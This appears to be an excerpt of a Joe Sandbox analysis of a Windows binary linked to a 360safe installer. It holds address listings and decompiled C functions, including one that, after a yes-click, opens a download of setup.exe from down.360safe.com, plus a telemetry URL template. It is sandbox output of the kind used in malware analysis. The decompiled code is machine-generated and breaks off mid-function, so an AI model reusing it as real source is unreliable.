                                                                                                                                                                                          0x00c9cd4f
                                                                                                                                                                                          0x00c9cd51
                                                                                                                                                                                          0x00c9cd58
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9cd5e
                                                                                                                                                                                          0x00c9cd60
                                                                                                                                                                                          0x00c9cd67
                                                                                                                                                                                          0x00c9cdb3
                                                                                                                                                                                          0x00c9cdb4
                                                                                                                                                                                          0x00c9cdb9
                                                                                                                                                                                          0x00c9cdba
                                                                                                                                                                                          0x00c9cdd3
                                                                                                                                                                                          0x00c9cdd3
                                                                                                                                                                                          0x00c9cdd9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9cdc4
                                                                                                                                                                                          0x00c9cdc9
                                                                                                                                                                                          0x00c9cdca
                                                                                                                                                                                          0x00c9cdcc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9cdd1
                                                                                                                                                                                          0x00c9cdd1
                                                                                                                                                                                          0x00c9cddb
                                                                                                                                                                                          0x00c9cddb
                                                                                                                                                                                          0x00c9cde4
                                                                                                                                                                                          0x00c9ce28
                                                                                                                                                                                          0x00c9ce28
                                                                                                                                                                                          0x00c9ce2b
                                                                                                                                                                                          0x00c9ce34
                                                                                                                                                                                          0x00c9ce54
                                                                                                                                                                                          0x00c9ce54
                                                                                                                                                                                          0x00c9ce57
                                                                                                                                                                                          0x00c9ce7e
                                                                                                                                                                                          0x00c9ce81
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9ce81
                                                                                                                                                                                          0x00c9ce59
                                                                                                                                                                                          0x00c9ce59
                                                                                                                                                                                          0x00c9ce5c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9ce5f
                                                                                                                                                                                          0x00c9ce5f
                                                                                                                                                                                          0x00c9ce60
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9ce62
                                                                                                                                                                                          0x00c9ce62
                                                                                                                                                                                          0x00c9ce65
                                                                                                                                                                                          0x00c9ce76
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9ce76
                                                                                                                                                                                          0x00c9ce67
                                                                                                                                                                                          0x00c9ce6a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9ce6c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9ce44
                                                                                                                                                                                          0x00c9ce44
                                                                                                                                                                                          0x00c9ce47
                                                                                                                                                                                          0x00c9ce83
                                                                                                                                                                                          0x00c9ce86
                                                                                                                                                                                          0x00c9ce8f
                                                                                                                                                                                          0x00c9ce91
                                                                                                                                                                                          0x00c9cf37
                                                                                                                                                                                          0x00c9cf37
                                                                                                                                                                                          0x00c9cf3c
                                                                                                                                                                                          0x00c9cf6a
                                                                                                                                                                                          0x00c9cf6a
                                                                                                                                                                                          0x00c9cf6c
                                                                                                                                                                                          0x00c9cf6f
                                                                                                                                                                                          0x00c9cf71
                                                                                                                                                                                          0x00c9cf21
                                                                                                                                                                                          0x00c9cf23
                                                                                                                                                                                          0x00c9cf8c
                                                                                                                                                                                          0x00c9cf8c
                                                                                                                                                                                          0x00c9cf90
                                                                                                                                                                                          0x00c9cf92
                                                                                                                                                                                          0x00c9cf92
                                                                                                                                                                                          0x00c9cf96
                                                                                                                                                                                          0x00c9cf9a
                                                                                                                                                                                          0x00c9cf9c
                                                                                                                                                                                          0x00c9cfe1
                                                                                                                                                                                          0x00c9cfe1
                                                                                                                                                                                          0x00c9cfe5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9cf9e
                                                                                                                                                                                          0x00c9cf9e
                                                                                                                                                                                          0x00c9cfd8
                                                                                                                                                                                          0x00c9cfd8
                                                                                                                                                                                          0x00c9cfda
                                                                                                                                                                                          0x00c9cfda
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9cfd8
                                                                                                                                                                                          0x00c9cf9c
                                                                                                                                                                                          0x00c9cf74
                                                                                                                                                                                          0x00c9cf7a
                                                                                                                                                                                          0x00c9cf7a
                                                                                                                                                                                          0x00c9cf7c
                                                                                                                                                                                          0x00c9cf7f
                                                                                                                                                                                          0x00c9cf83
                                                                                                                                                                                          0x00c9cf83
                                                                                                                                                                                          0x00c9cf83
                                                                                                                                                                                          0x00c9cf84
                                                                                                                                                                                          0x00c9cf86
                                                                                                                                                                                          0x00c9cec8
                                                                                                                                                                                          0x00c9cec8
                                                                                                                                                                                          0x00c9cecb
                                                                                                                                                                                          0x00c9cece
                                                                                                                                                                                          0x00c9cfa2
                                                                                                                                                                                          0x00c9cfa2
                                                                                                                                                                                          0x00c9cfa5
                                                                                                                                                                                          0x00c9cfde
                                                                                                                                                                                          0x00c9cfde
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9cfde
                                                                                                                                                                                          0x00c9cfa7
                                                                                                                                                                                          0x00c9cfa7
                                                                                                                                                                                          0x00c9cfa8
                                                                                                                                                                                          0x00c9cfb7
                                                                                                                                                                                          0x00c9cfb7
                                                                                                                                                                                          0x00c9cfbf
                                                                                                                                                                                          0x00c9cfc6
                                                                                                                                                                                          0x00c9cfc6
                                                                                                                                                                                          0x00c9cfc6
                                                                                                                                                                                          0x00c9cfc9
                                                                                                                                                                                          0x00c9cfd3
                                                                                                                                                                                          0x00c9cfd4
                                                                                                                                                                                          0x00c9cfd6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9cfd6
                                                                                                                                                                                          0x00c9cfc1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9cfc1
                                                                                                                                                                                          0x00c9cfaa
                                                                                                                                                                                          0x00c9cfaa
                                                                                                                                                                                          0x00c9cfab
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9cfad
                                                                                                                                                                                          0x00c9cfad
                                                                                                                                                                                          0x00c9cfb0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9cfb2
                                                                                                                                                                                          0x00c9cfb5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9cfb5
                                                                                                                                                                                          0x00c9ced4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9cedd
                                                                                                                                                                                          0x00c9cf02
                                                                                                                                                                                          0x00c9cf07
                                                                                                                                                                                          0x00c9cf0d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9cee4
                                                                                                                                                                                          0x00c9cee7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9cef6
                                                                                                                                                                                          0x00c9cefc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9cefc
                                                                                                                                                                                          0x00c9cee7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9cf86
                                                                                                                                                                                          0x00c9cf3e
                                                                                                                                                                                          0x00c9cf3e
                                                                                                                                                                                          0x00c9cf43
                                                                                                                                                                                          0x00c9cf2f
                                                                                                                                                                                          0x00c9cf31
                                                                                                                                                                                          0x00c9cf32
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9cf32
                                                                                                                                                                                          0x00c9cf45
                                                                                                                                                                                          0x00c9cf45
                                                                                                                                                                                          0x00c9cf48
                                                                                                                                                                                          0x00c9cf58
                                                                                                                                                                                          0x00c9cf58
                                                                                                                                                                                          0x00c9cf5a
                                                                                                                                                                                          0x00c9cf5d
                                                                                                                                                                                          0x00c9cf5f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9cf62
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9cf67
                                                                                                                                                                                          0x00c9cf4a
                                                                                                                                                                                          0x00c9cf4a
                                                                                                                                                                                          0x00c9cf4d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9cf4f
                                                                                                                                                                                          0x00c9cf52
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9cf52
                                                                                                                                                                                          0x00c9ce97
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9ce9d
                                                                                                                                                                                          0x00c9cea0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9cea8
                                                                                                                                                                                          0x00c9cea9
                                                                                                                                                                                          0x00c9ceab
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9ceb1
                                                                                                                                                                                          0x00c9ceb3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9ceb5
                                                                                                                                                                                          0x00c9ceb7
                                                                                                                                                                                          0x00c9cf18
                                                                                                                                                                                          0x00c9cf1a
                                                                                                                                                                                          0x00c9cf1d
                                                                                                                                                                                          0x00c9cf1f
                                                                                                                                                                                          0x00c9cf27
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9cf27
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9cf1f
                                                                                                                                                                                          0x00c9ceb9
                                                                                                                                                                                          0x00c9cebe
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9cec2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9cec2
                                                                                                                                                                                          0x00c9ce34
                                                                                                                                                                                          0x00c9cde9
                                                                                                                                                                                          0x00c9cdef
                                                                                                                                                                                          0x00c9cdf0
                                                                                                                                                                                          0x00c9ce01
                                                                                                                                                                                          0x00c9ce06
                                                                                                                                                                                          0x00c9ce07
                                                                                                                                                                                          0x00c9ce20
                                                                                                                                                                                          0x00c9ce20
                                                                                                                                                                                          0x00c9ce23
                                                                                                                                                                                          0x00c9ce26
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9ce11
                                                                                                                                                                                          0x00c9ce16
                                                                                                                                                                                          0x00c9ce17
                                                                                                                                                                                          0x00c9ce19
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9ce1e
                                                                                                                                                                                          0x00c9ce1e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9ce20
                                                                                                                                                                                          0x00c9cdf2
                                                                                                                                                                                          0x00c9cdf4
                                                                                                                                                                                          0x00c9cdf7
                                                                                                                                                                                          0x00c9cdfd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9cd69
                                                                                                                                                                                          0x00c9cd69
                                                                                                                                                                                          0x00c9cd6d
                                                                                                                                                                                          0x00c9cd76
                                                                                                                                                                                          0x00c9cd7a
                                                                                                                                                                                          0x00c9cd87
                                                                                                                                                                                          0x00c9cd8b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9cd8d
                                                                                                                                                                                          0x00c9cd91
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9cd93
                                                                                                                                                                                          0x00c9cd97
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9cd99
                                                                                                                                                                                          0x00c9cd9d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9cd9d
                                                                                                                                                                                          0x00c9cd7c
                                                                                                                                                                                          0x00c9cd7e
                                                                                                                                                                                          0x00c9cd81
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9cd81
                                                                                                                                                                                          0x00c9cd6f
                                                                                                                                                                                          0x00c9cd9f
                                                                                                                                                                                          0x00c9cda2
                                                                                                                                                                                          0x00c9cda4
                                                                                                                                                                                          0x00c9cda7
                                                                                                                                                                                          0x00c9cdb1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9cff6
                                                                                                                                                                                          0x00c9cff9
                                                                                                                                                                                          0x00c9cffb
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CharNextW.USER32(?,?,00000000,?,?,/safe/instcomp.htm?soft=425&status=%d&mid={mid}&from={from}&ver={ver}&vv=10&appkey=&usetime=%d&downrate=%d&downlen=%d,?,00000000,00000000,00000000,?,00000000,00C9BE1B,00000018), ref: 00C9CD4D
                                                                                                                                                                                          • CharNextW.USER32(00000000,?,?,/safe/instcomp.htm?soft=425&status=%d&mid={mid}&from={from}&ver={ver}&vv=10&appkey=&usetime=%d&downrate=%d&downlen=%d,?,00000000,00000000,00000000,?,00000000,00C9BE1B,00000018), ref: 00C9CDA0
                                                                                                                                                                                          • CharNextW.USER32(00000000,?,?,/safe/instcomp.htm?soft=425&status=%d&mid={mid}&from={from}&ver={ver}&vv=10&appkey=&usetime=%d&downrate=%d&downlen=%d,?,00000000,00000000,00000000,?,00000000,00C9BE1B,00000018), ref: 00C9CDCF
                                                                                                                                                                                          • CharNextW.USER32(00000000), ref: 00C9CDE7
                                                                                                                                                                                          • CharNextW.USER32(00000000), ref: 00C9CDFB
                                                                                                                                                                                          • CharNextW.USER32(00000000), ref: 00C9CE1C
                                                                                                                                                                                          • CharNextW.USER32(00000000), ref: 00C9CE7F
                                                                                                                                                                                          • OutputDebugStringW.KERNEL32(Floating point (%%e, %%f, %%g, and %%G) is not supported by the WTL::CString class.), ref: 00C9CF07
                                                                                                                                                                                          • DebugBreak.KERNEL32 ref: 00C9CF0D
                                                                                                                                                                                          • lstrlenW.KERNEL32(-00000043), ref: 00C9CF27
                                                                                                                                                                                          • CharNextW.USER32(?,?,00000000,?,?,/safe/instcomp.htm?soft=425&status=%d&mid={mid}&from={from}&ver={ver}&vv=10&appkey=&usetime=%d&downrate=%d&downlen=%d,?,00000000,00000000,00000000,?,00000000,00C9BE1B,00000018), ref: 00C9CFEC
                                                                                                                                                                                          • CharNextW.USER32(?,?,?,/safe/instcomp.htm?soft=425&status=%d&mid={mid}&from={from}&ver={ver}&vv=10&appkey=&usetime=%d&downrate=%d&downlen=%d,?,00000000,00000000,00000000,?,00000000,00C9BE1B,00000018), ref: 00C9CFF7
                                                                                                                                                                                          • _vswprintf_s.LIBCMT ref: 00C9D025
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • Floating point (%%e, %%f, %%g, and %%G) is not supported by the WTL::CString class., xrefs: 00C9CF02
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CharNext$Debug$BreakOutputString_vswprintf_slstrlen
                                                                                                                                                                                          • String ID: Floating point (%%e, %%f, %%g, and %%G) is not supported by the WTL::CString class.
                                                                                                                                                                                          • API String ID: 3028684255-233888011
                                                                                                                                                                                          • Opcode ID: 11d2daac3dcb1487235307db73ae105e2200fde7ecfaba012c45294f2269a607
                                                                                                                                                                                          • Instruction ID: c39d1cbe5171401ac72ec1b4d711495f2f97a079f1bc5ed98d5b91272f244fbf
                                                                                                                                                                                          • Opcode Fuzzy Hash: 11d2daac3dcb1487235307db73ae105e2200fde7ecfaba012c45294f2269a607
                                                                                                                                                                                          • Instruction Fuzzy Hash: D88102725043128BDF309FBDC8CC63AB6E2EF55750F54492AE8A2D3190D734DF8292A6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C8E940 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 105windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 53%
                                                                                                                                                                                          			E00C8E940(void* __ebx, void* __eflags, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, signed int _a4096) {
				short _v4;
				void* __edi;
				void* __esi;
				signed int _t17;
				int _t31;
				void* _t35;
				void* _t49;
				WCHAR* _t51;
				void* _t53;
				signed int _t54;
				signed int _t55;
				signed int _t63;

				_t38 = __ebx;
				_t55 = _t54 & 0xfffffff8;
				E00D00E90(0x1008);
				_t17 =  *0xd64070; // 0x8a9e1774
				_a4096 = _t17 ^ _t55;
				_t51 = _a8;
				E00D006A0(_a4,  &_v4, 0, 0x1000);
				E00D03717( &_v4, 0xd482c8, 0x800);
				E00D036D7( &_v4, _t51, 0x800);
				E00D036D7( &_v4, 0xd482d0, 0x800);
				E00D036D7( &_v4, _t51, 0x800);
				E00D036D7( &_v4, 0xd482fc, 0x800);
				E00D036D7( &_v4, _a4, 0x800);
				E00D036D7( &_v4, 0xd48320, 0x800);
				_t63 = _t55 + 0x60;
				_t46 =  &_v4;
				_t31 = MessageBoxW(GetActiveWindow(),  &_v4, _t51, 0x14);
				_t52 = _t31;
				if(_t31 == 6) {
					_t35 = E00D06060( &_v4, L"http://down.360safe.com/setup.exe", L"http://down.360safe.com/setup.exe", 0xc8);
					_t63 = _t63 + 0xc;
					_t66 = _t35;
					if(_t35 != 0 || E00C8E830(__ebx, _t66) == 0) {
						_push(5);
						_push(0);
						_push(0);
						_push(L"http://down.360safe.com/setup.exe");
					} else {
						_push(5);
						_push(0);
						_push(0);
						_push(L"http://down.360safe.com/setupbeta.exe");
					}
					ShellExecuteW(0, L"open", ??, ??, ??, ??);
				}
				if(_a12 != 0) {
					E00D0363F(0);
				}
				_pop(_t49);
				_pop(_t53);
				return E00D0071A(_t52, _t38, _a4096 ^ _t63, _t46, _t49, _t53);
			}















                                                                                                                                                                                          0x00c8e940
                                                                                                                                                                                          0x00c8e943
                                                                                                                                                                                          0x00c8e94b
                                                                                                                                                                                          0x00c8e950
                                                                                                                                                                                          0x00c8e957
                                                                                                                                                                                          0x00c8e95f
                                                                                                                                                                                          0x00c8e972
                                                                                                                                                                                          0x00c8e989
                                                                                                                                                                                          0x00c8e99c
                                                                                                                                                                                          0x00c8e9b3
                                                                                                                                                                                          0x00c8e9c6
                                                                                                                                                                                          0x00c8e9dd
                                                                                                                                                                                          0x00c8e9f0
                                                                                                                                                                                          0x00c8ea07
                                                                                                                                                                                          0x00c8ea0c
                                                                                                                                                                                          0x00c8ea12
                                                                                                                                                                                          0x00c8ea1e
                                                                                                                                                                                          0x00c8ea24
                                                                                                                                                                                          0x00c8ea29
                                                                                                                                                                                          0x00c8ea3a
                                                                                                                                                                                          0x00c8ea3f
                                                                                                                                                                                          0x00c8ea42
                                                                                                                                                                                          0x00c8ea44
                                                                                                                                                                                          0x00c8ea5c
                                                                                                                                                                                          0x00c8ea5e
                                                                                                                                                                                          0x00c8ea60
                                                                                                                                                                                          0x00c8ea62
                                                                                                                                                                                          0x00c8ea4f
                                                                                                                                                                                          0x00c8ea4f
                                                                                                                                                                                          0x00c8ea51
                                                                                                                                                                                          0x00c8ea53
                                                                                                                                                                                          0x00c8ea55
                                                                                                                                                                                          0x00c8ea55
                                                                                                                                                                                          0x00c8ea6e
                                                                                                                                                                                          0x00c8ea6e
                                                                                                                                                                                          0x00c8ea78
                                                                                                                                                                                          0x00c8ea7c
                                                                                                                                                                                          0x00c8ea7c
                                                                                                                                                                                          0x00c8ea88
                                                                                                                                                                                          0x00c8ea8b
                                                                                                                                                                                          0x00c8ea96

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 00C8E972
                                                                                                                                                                                          • _wcsncpy.LIBCMT ref: 00C8E989
                                                                                                                                                                                          • _wcsncat.LIBCMT ref: 00C8E99C
                                                                                                                                                                                          • _wcsncat.LIBCMT ref: 00C8E9B3
                                                                                                                                                                                          • _wcsncat.LIBCMT ref: 00C8E9C6
                                                                                                                                                                                          • _wcsncat.LIBCMT ref: 00C8E9DD
                                                                                                                                                                                          • _wcsncat.LIBCMT ref: 00C8E9F0
                                                                                                                                                                                          • _wcsncat.LIBCMT ref: 00C8EA07
                                                                                                                                                                                          • GetActiveWindow.USER32 ref: 00C8EA17
                                                                                                                                                                                          • MessageBoxW.USER32(00000000), ref: 00C8EA1E
                                                                                                                                                                                          • __wcsnicmp.LIBCMT ref: 00C8EA3A
                                                                                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,http://down.360safe.com/setup.exe,00000000,00000000,00000005), ref: 00C8EA6E
                                                                                                                                                                                            • Part of subcall function 00C8E830: _memset.LIBCMT ref: 00C8E858
                                                                                                                                                                                            • Part of subcall function 00C8E830: SHGetValueW.SHLWAPI ref: 00C8E88E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _wcsncat$_memset$ActiveExecuteMessageShellValueWindow__wcsnicmp_wcsncpy
                                                                                                                                                                                          • String ID: http://down.360safe.com/setup.exe$http://down.360safe.com/setup.exe$http://down.360safe.com/setupbeta.exe$open
                                                                                                                                                                                          • API String ID: 3101572146-4010294613
                                                                                                                                                                                          • Opcode ID: f32231ad86e17a862e5ddfc2bb84bf26786f0d44d7ed6c531bf3407a4e04267d
                                                                                                                                                                                          • Instruction ID: 4b9d5e20b4e0d83481f78f38ec6922ce71d53127243fd92389e73eed4801c562
                                                                                                                                                                                          • Opcode Fuzzy Hash: f32231ad86e17a862e5ddfc2bb84bf26786f0d44d7ed6c531bf3407a4e04267d
                                                                                                                                                                                          • Instruction Fuzzy Hash: AE317575F943007BE110BA649C4BFDB779CAB54B10F408518F758A61C2EEF2960897F6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C9948F Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 201stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                                                                          			E00C9948F(void* __ebx, WCHAR** __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t56;
				WCHAR* _t59;
				signed int _t60;
				WCHAR* _t61;
				signed int _t64;
				signed int _t65;
				signed int _t66;
				signed int _t68;
				signed int _t70;
				WCHAR* _t71;
				WCHAR* _t72;
				WCHAR* _t73;
				WCHAR* _t74;
				signed int _t75;
				WCHAR* _t76;
				signed int _t77;
				signed int _t79;
				signed int _t83;
				signed int _t84;
				WCHAR* _t85;
				signed int _t86;
				signed int _t89;
				void* _t99;
				WCHAR* _t105;
				void* _t107;
				WCHAR* _t109;
				WCHAR** _t111;
				void* _t112;
				void* _t113;

				_t107 = __edx;
				_push(0x64);
				E00D015C3(0xd2fdea, __ebx, __edi, __esi);
				_t109 =  *(_t112 + 8);
				_t89 =  *(_t112 + 0xc);
				_t111 = __ecx;
				 *(_t112 - 0x70) = _t89;
				if(_t109 == 0 || _t89 == 0) {
				} else {
					 *_t89 =  *_t89 & 0x00000000;
					E00C98B16(_t112 - 0x6c, lstrlenW(_t109) + _t51);
					 *((intOrPtr*)(_t112 - 4)) = 0;
					if( *(_t112 - 0x64) != 0) {
						 *((char*)(_t112 - 0x59)) = 0;
						 *_t111 = _t109;
						_t56 = E00C98F52(_t112 - 0x59);
						 *(_t112 - 0x58) = _t56;
						__eflags = _t56;
						if(_t56 >= 0) {
							 *(_t112 - 0x60) =  *(_t112 - 0x60) & 0x00000000;
							__eflags =  *_t109;
							 *((char*)(_t112 - 0x52)) = 0;
							 *((char*)(_t112 - 0x51)) = 0;
							if( *_t109 == 0) {
								L43:
								__eflags =  *(_t112 - 0x58);
								if( *(_t112 - 0x58) >= 0) {
									 *(_t112 - 0x64) =  *(_t112 - 0x64) & 0x00000000;
									 *_t89 =  *(_t112 - 0x64);
								}
								goto L5;
							}
							_t109 = CharNextW;
							do {
								__eflags =  *((char*)(_t112 - 0x59)) - 1;
								if( *((char*)(_t112 - 0x59)) != 1) {
									L28:
									_t59 =  *_t111;
									__eflags =  *_t59 - 0x25;
									if( *_t59 != 0x25) {
										_t60 = E00C98B53(_t89, _t112 - 0x6c, _t59, 1);
										__eflags = _t60;
										if(_t60 != 0) {
											goto L39;
										}
										 *(_t112 - 0x58) = 0x8007000e;
										goto L43;
									}
									_t76 = CharNextW(_t59);
									 *_t111 = _t76;
									__eflags =  *_t76 - 0x25;
									if( *_t76 != 0x25) {
										_t77 = E00C98CFF(_t76, 0x25);
										_t89 = _t77;
										__eflags = _t89;
										if(_t89 == 0) {
											L45:
											 *(_t112 - 0x58) = 0x80020009;
											goto L5;
										}
										_t95 =  *_t111;
										_t79 = _t77 -  *_t111 >> 1;
										__eflags = _t79 - 0x1f;
										if(_t79 > 0x1f) {
											 *(_t112 - 0x58) = 0x80004005;
											goto L5;
										}
										E00C98889(_t107, _t112 - 0x50, 0x20, _t95, _t79);
										_t113 = _t113 + 0x10;
										_t83 = E00C99464(_t111[1], _t112 - 0x50);
										__eflags = _t83;
										if(__eflags == 0) {
											goto L45;
										}
										_push(_t83);
										_t84 = E00C9924D(_t89, _t112 - 0x6c, _t109, _t111, __eflags);
										__eflags = _t84;
										if(_t84 == 0) {
											L31:
											 *(_t112 - 0x58) = 0x8007000e;
											goto L5;
										}
										__eflags =  *_t111 - _t89;
										if( *_t111 == _t89) {
											L38:
											_t89 =  *(_t112 - 0x70);
											goto L39;
										} else {
											goto L37;
										}
										do {
											L37:
											_t85 = CharNextW( *_t111);
											 *_t111 = _t85;
											__eflags = _t85 - _t89;
										} while (_t85 != _t89);
										goto L38;
									}
									_t86 = E00C98B53(_t89, _t112 - 0x6c, _t76, 1);
									__eflags = _t86;
									if(_t86 != 0) {
										goto L39;
									}
									goto L31;
								}
								__eflags =  *(_t112 - 0x60);
								if( *(_t112 - 0x60) != 0) {
									L14:
									_t99 = 0x27;
									__eflags = _t99 -  *( *_t111);
									if(_t99 !=  *( *_t111)) {
										L20:
										__eflags =  *((char*)(_t112 - 0x51));
										if( *((char*)(_t112 - 0x51)) != 0) {
											goto L28;
										}
										L21:
										_t64 =  *( *_t111) & 0x0000ffff;
										__eflags = _t64 - 0x7b;
										if(_t64 == 0x7b) {
											_t25 = _t112 - 0x60;
											 *_t25 =  *(_t112 - 0x60) + 1;
											__eflags =  *_t25;
										}
										__eflags = _t64 - 0x7d;
										if(_t64 == 0x7d) {
											_t27 = _t112 - 0x60;
